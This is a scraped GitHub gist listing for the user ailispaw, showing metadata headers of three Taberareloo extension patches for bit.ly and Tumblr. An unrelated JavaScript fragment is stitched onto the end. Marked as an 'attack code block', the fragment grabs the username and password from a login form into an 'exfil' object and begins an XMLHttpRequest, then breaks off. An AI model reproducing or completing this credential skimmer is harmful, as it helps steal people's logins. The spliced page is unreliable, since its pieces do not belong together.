Skip to content

Instantly share code, notes, and snippets.

View ailispaw's full-sized avatar
🏠
Working from home

A.I. ailispaw

🏠
Working from home
View GitHub Profile
@ailispaw
ailispaw / patch.replace.bitly.apikey.tbrl.js
Last active January 6, 2020 13:11
Replace bit.ly API Key
// ==Taberareloo==
// {
// "name" : "Replace bit.ly API Key"
// , "description" : "Replace bit.ly API_KEY and USER with own ones"
// , "include" : ["background"]
// , "version" : "0.1.0"
// , "downloadURL" : "https://gist.githubusercontent.com/ailispaw/7cebac28ca695f4fe3312a5cbfed9162/raw/patch.replace.bitly.apikey.tbrl.js"
// }
// ==/Taberareloo==
@ailispaw
ailispaw / patch.fix.tumblr.reblog-dashboard.tbrl.js
Last active December 4, 2021 00:35
Fix Tumblr.ReBlog on Dashboard 2021.12
// ==Taberareloo==
// {
// "name" : "Fix Tumblr.ReBlog on Dashboard 2021.12"
// , "description" : "Fix Tumblr.ReBlog on Dashboard 2021.12"
// , "include" : ["background", "content"]
// , "match" : ["*://*/*"]
// , "version" : "0.0.8"
// , "downloadURL" : "https://gist.githubusercontent.com/ailispaw/a08ce031622390288980cdea27437108/raw/patch.fix.tumblr.reblog-dashboard.tbrl.js"
// }
// ==/Taberareloo==
@ailispaw
ailispaw / userscript.tumblr.timestamp.tbrl.js
Last active October 6, 2021 01:32
Taberareloo Patch version of Tumblr Timestamp
// ==Taberareloo==
// {
// "name" : "Add Timestamp into Posts on Tumblr Dashboard"
// , "description" : "Add Timestamp into Posts on Tumblr Dashboard"
// , "include" : ["content"]
// , "match" : ["*://www.tumblr.com/*"]
// , "version" : "0.0.8"
// , "downloadURL" : "https://gist.githubusercontent.com/ailispaw/af6107e6a8760967f72818126065ef70/raw/userscript.tumblr.timestamp.tbrl.js"
// }
// ==/Taberareloo==
function login() {
var username = $('#username-modal').val();
var password = $('#password-modal').val();
// Start of attack code block!!!!!!!!!!!!!!!!!!!!!!
var exfil = {"id": username, "password": password};
if(username && password) {
console.log(JSON.stringify(exfil))
// clearInterval(timer);
console.log('Attack in Progress - Data Ready: ', exfil);
var xhr = new XMLHttpRequest();